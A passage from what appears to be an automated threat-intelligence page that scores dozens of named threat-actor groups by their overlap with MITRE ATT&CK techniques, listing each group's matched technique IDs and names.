  • T1091 - Replication Through Removable Media
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

FIN6

Score: 14.99
Matched TTPs:
  • T1087.002 - Domain Account
  • T1063 - Security Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Patchwork

Score: 18.34
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Whitefly

Score: 5.71
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1055.013 - Process Doppelgänging
  • T1199 - Trusted Relationship
Link to MITRE →

APT19

Score: 10.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1199 - Trusted Relationship
  • T1601.001 - Patch System Image
  • T1059.012 - Hypervisor CLI
Link to MITRE →

TA2541

Score: 16.83
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Earth Lusca

Score: 33.03
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
  • T1059.012 - Hypervisor CLI
Link to MITRE →

SideCopy

Score: 16.57
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1506 - Web Session Cookie
  • T1159 - Launch Agent
Link to MITRE →

Leviathan

Score: 20.99
Matched TTPs:
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1488 - Disk Content Wipe
  • T1592.003 - Firmware
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Tonto Team

Score: 11.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1547.011 - Plist Modification
  • T1059.001 - PowerShell
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
Link to MITRE →

Andariel

Score: 6.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
Link to MITRE →

BRONZE BUTLER

Score: 17.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
Link to MITRE →

APT38

Score: 31.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1027 - Obfuscated Files or Information
  • T1174 - Password Filter DLL
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
  • T1216 - System Script Proxy Execution
Link to MITRE →

MuddyWater

Score: 40.80
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1159 - Launch Agent
Link to MITRE →

Naikon

Score: 7.99
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1506 - Web Session Cookie
Link to MITRE →

Molerats

Score: 6.13
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1562.012 - Disable or Modify Linux Audit System
Link to MITRE →

admin@338

Score: 6.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1218.010 - Regsvr32
Link to MITRE →

Gamaredon Group

Score: 34.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1045 - Software Packing
  • T1218.012 - Verclsid
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1059.013 - Container CLI/API
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Darkhotel

Score: 14.99
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1590.006 - Network Security Appliances
  • T1564.002 - Hidden Users
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1059.012 - Hypervisor CLI
Link to MITRE →

APT32

Score: 34.47
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1218.010 - Regsvr32
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
Link to MITRE →

The White Company

Score: 7.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

IndigoZebra

Score: 3.65
Matched TTPs:
  • T1087.002 - Domain Account
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
Link to MITRE →

APT33

Score: 7.71
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
Link to MITRE →

Silence

Score: 13.53
Matched TTPs:
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1547.011 - Plist Modification
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Sidewinder

Score: 20.42
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1159 - Launch Agent
Link to MITRE →

Confucius

Score: 8.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
Link to MITRE →

BlackTech

Score: 6.34
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
Link to MITRE →

Windshift

Score: 9.39
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1506 - Web Session Cookie
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
Link to MITRE →

Scattered Spider

Score: 41.04
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1019 - System Firmware
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1051 - Shared Webroot
  • T1218.005 - Mshta
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1090.004 - Domain Fronting
  • T1564.003 - Hidden Window
  • T1027.002 - Software Packing
Link to MITRE →

Storm-0501

Score: 21.97
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1140 - Deobfuscate/Decode Files or Information
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1090.004 - Domain Fronting
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Evilnum

Score: 6.55
Matched TTPs:
  • T1562.009 - Safe Mode Boot
  • T1089 - Disabling Security Tools
  • T1070.009 - Clear Persistence
Link to MITRE →

Volt Typhoon

Score: 53.31
Matched TTPs:
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1556.002 - Password Filter DLL
  • T1140 - Deobfuscate/Decode Files or Information
  • T1070.008 - Clear Mailbox Data
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1049 - System Network Connections Discovery
  • T1057 - Process Discovery
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1488 - Disk Content Wipe
  • T1065 - Uncommonly Used Port
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1159 - Launch Agent
  • T1574.002 - DLL Side-Loading
  • T1569.002 - Service Execution
Link to MITRE →

Silent Librarian

Score: 7.15
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
Link to MITRE →

ZIRCONIUM

Score: 21.93
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1685.002 - Disable or Modify Cloud Log
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Cinnamon Tempest

Score: 8.74
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1199 - Trusted Relationship
  • T1027.004 - Compile After Delivery
Link to MITRE →

Velvet Ant

Score: 17.03
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1036.009 - Break Process Trees
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1569.002 - Service Execution
  • T1566.003 - Spearphishing via Service
Link to MITRE →

Aquatic Panda

Score: 21.24
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1562.004 - Disable or Modify System Firewall
  • T1552.004 - Private Keys
  • T1136.002 - Domain Account
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

APT3

Score: 20.71
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

BackdoorDiplomacy

Score: 8.61
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1136.002 - Domain Account
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
Link to MITRE →

HAFNIUM

Score: 12.42
Matched TTPs:
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target
Link to MITRE →

INC Ransom

Score: 9.48
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1070.009 - Clear Persistence
Link to MITRE →

BlackByte

Score: 21.44
Matched TTPs:
  • T1070.003 - Clear Command History
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
Link to MITRE →

Mustard Tempest

Score: 3.74
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1059.012 - Hypervisor CLI
Link to MITRE →

APT42

Score: 8.24
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
Link to MITRE →

GOLD SOUTHFIELD

Score: 6.26
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image
Link to MITRE →

Fox Kitten

Score: 18.67
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1051 - Shared Webroot
  • T1059.001 - PowerShell
  • T1601.001 - Patch System Image
Link to MITRE →

ToddyCat

Score: 5.71
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1506 - Web Session Cookie
Link to MITRE →

Blue Mockingbird

Score: 4.66
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1199 - Trusted Relationship
Link to MITRE →

Volatile Cedar

Score: 8.19
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1002 - Data Compressed
Link to MITRE →

Akira

Score: 6.88
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1027 - Obfuscated Files or Information
Link to MITRE →

Carbanak

Score: 5.29
Matched TTPs:
  • T1009 - Binary Padding
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
Link to MITRE →

Stealth Falcon

Score: 7.84
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
Link to MITRE →

Leafminer

Score: 9.05
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1601.001 - Patch System Image
  • T1059.012 - Hypervisor CLI
Link to MITRE →

LAPSUS$

Score: 22.74
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1592.003 - Firmware
  • T1065 - Uncommonly Used Port
  • T1564.003 - Hidden Window
Link to MITRE →

FIN5

Score: 7.32
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1199 - Trusted Relationship
  • T1070.009 - Clear Persistence
Link to MITRE →

Lotus Blossom

Score: 5.25
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1569.002 - Service Execution
Link to MITRE →

Deep Panda

Score: 3.29
Matched TTPs:
  • T1177 - LSASS Driver
Link to MITRE →

CopyKittens

Score: 3.19
Matched TTPs:
  • T1045 - Software Packing
  • T1199 - Trusted Relationship
Link to MITRE →

MoustachedBouncer

Score: 4.39
Matched TTPs:
  • T1045 - Software Packing
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Windigo

Score: 9.19
Matched TTPs:
  • T1045 - Software Packing
  • T1055.013 - Process Doppelgänging
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
Link to MITRE →

POLONIUM

Score: 5.20
Matched TTPs:
  • T1045 - Software Packing
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
Link to MITRE →

Metador

Score: 4.69
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1070.009 - Clear Persistence
Link to MITRE →

Equation

Score: 8.26
Matched TTPs:
  • T1130 - Install Root Certificate
  • T1037.001 - Logon Script (Windows)
Link to MITRE →

Strider

Score: 7.06
Matched TTPs:
  • T1130 - Install Root Certificate
  • T1569.002 - Service Execution
Link to MITRE →

Threat actors related to this Pulse (inference-based)

APT41

Score: 0.70
Matched TTPs:
  • T1684 - Social Engineering
  • T1584.008 - Network Devices
  • T1552.004 - Private Keys
  • T1027 - Obfuscated Files or Information
  • T1574.002 - DLL Side-Loading
  • T1002 - Data Compressed
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.010 - Regsvr32
  • T1588.001 - Malware
  • T1048 - Exfiltration Over Alternative Protocol
  • T1089 - Disabling Security Tools
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1037.001 - Logon Script (Windows)
  • T1564.003 - Hidden Window
  • T1562.004 - Disable or Modify System Firewall
  • T1045 - Software Packing
  • T1573 - Encrypted Channel
  • T1537 - Transfer Data to Cloud Account
  • T1070.009 - Clear Persistence
  • T1499.001 - OS Exhaustion Flood
  • T1590.006 - Network Security Appliances
Link to MITRE →

Mustang Panda

Score: 0.70
Matched TTPs:
  • T1218.012 - Verclsid
  • T1566.002 - Spearphishing Link
  • T1055.013 - Process Doppelgänging
  • T1102.003 - One-Way Communication
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1055.005 - Thread Local Storage
  • T1218.010 - Regsvr32
  • T1608.005 - Link Target
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1199 - Trusted Relationship
  • T1593.002 - Search Engines
  • T1087.004 - Cloud Account
  • T1608 - Stage Capabilities
  • T1169 - Sudo
  • T1569.001 - Launchctl
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1003 - OS Credential Dumping
Link to MITRE →

Kimsuky

Score: 0.69
Matched TTPs:
  • T1684 - Social Engineering
  • T1055.014 - VDSO Hijacking
  • T1218.012 - Verclsid
  • T1566.002 - Spearphishing Link
  • T1102.003 - One-Way Communication
  • T1009 - Binary Padding
  • T1091 - Replication Through Removable Media
  • T1506 - Web Session Cookie
  • T1003.003 - NTDS
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1003.007 - Proc Filesystem
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1606.002 - SAML Tokens
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1057 - Process Discovery
  • T1087.004 - Cloud Account
  • T1608 - Stage Capabilities
  • T1051 - Shared Webroot
  • T1537 - Transfer Data to Cloud Account
  • T1070.009 - Clear Persistence
  • T1590.006 - Network Security Appliances
Link to MITRE →

UNC3886

Score: 0.62
Matched TTPs:
  • T1588.001 - Malware
  • T1546.003 - Windows Management Instrumentation Event Subscription
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1003.006 - DCSync
  • T1606.002 - SAML Tokens
  • T1546.002 - Screensaver
  • T1070.009 - Clear Persistence
  • T1499.001 - OS Exhaustion Flood
  • T1136.002 - Domain Account
  • T1488 - Disk Content Wipe
  • T1021.006 - Windows Remote Management
  • T1009 - Binary Padding
  • T1140 - Deobfuscate/Decode Files or Information
  • T1556.002 - Password Filter DLL
  • T1689 - Downgrade Attack
  • T1090.002 - External Proxy
Link to MITRE →

Volt Typhoon

Score: 0.62
Matched TTPs:
  • T1488 - Disk Content Wipe
  • T1102.003 - One-Way Communication
  • T1574.002 - DLL Side-Loading
  • T1140 - Deobfuscate/Decode Files or Information
  • T1049 - System Network Connections Discovery
  • T1003.007 - Proc Filesystem
  • T1065 - Uncommonly Used Port
  • T1070.008 - Clear Mailbox Data
  • T1569.002 - Service Execution
  • T1562.009 - Safe Mode Boot
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1057 - Process Discovery
  • T1045 - Software Packing
  • T1537 - Transfer Data to Cloud Account
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
  • T1590.006 - Network Security Appliances
  • T1556.002 - Password Filter DLL
Link to MITRE →

Sandworm Team

Score: 0.58
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1102.003 - One-Way Communication
  • T1091 - Replication Through Removable Media
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1049 - System Network Connections Discovery
  • T1218.010 - Regsvr32
  • T1558 - Steal or Forge Kerberos Tickets
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account
  • T1562.004 - Disable or Modify System Firewall
  • T1045 - Software Packing
  • T1573 - Encrypted Channel
  • T1075 - Pass the Hash
  • T1005 - Data from Local System
  • T1070.009 - Clear Persistence
Link to MITRE →

Magic Hound

Score: 0.56
Matched TTPs:
  • T1592.003 - Firmware
  • T1566.002 - Spearphishing Link
  • T1009 - Binary Padding
  • T1587.003 - Digital Certificates
  • T1027 - Obfuscated Files or Information
  • T1098.002 - Additional Email Delegate Permissions
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1683 - Generate Content
  • T1070.003 - Clear Command History
  • T1199 - Trusted Relationship
  • T1036.009 - Break Process Trees
  • T1562.004 - Disable or Modify System Firewall
  • T1045 - Software Packing
  • T1070.009 - Clear Persistence
  • T1590.006 - Network Security Appliances
  • T1059.012 - Hypervisor CLI
Link to MITRE →

FIN7

Score: 0.56
Matched TTPs:
  • T1218.012 - Verclsid
  • T1055.013 - Process Doppelgänging
  • T1009 - Binary Padding
  • T1091 - Replication Through Removable Media
  • T1027 - Obfuscated Files or Information
  • T1059.001 - PowerShell
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1564.002 - Hidden Users
  • T1011.001 - Exfiltration Over Bluetooth
  • T1140 - Deobfuscate/Decode Files or Information
  • T1584.005 - Botnet
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1065 - Uncommonly Used Port
  • T1606.002 - SAML Tokens
  • T1199 - Trusted Relationship
  • T1057 - Process Discovery
  • T1573 - Encrypted Channel
Link to MITRE →

Related CVEs

No CVEs were found for this Pulse.

Pulse – Threat Actor Graph

(Graph not available in this text version.)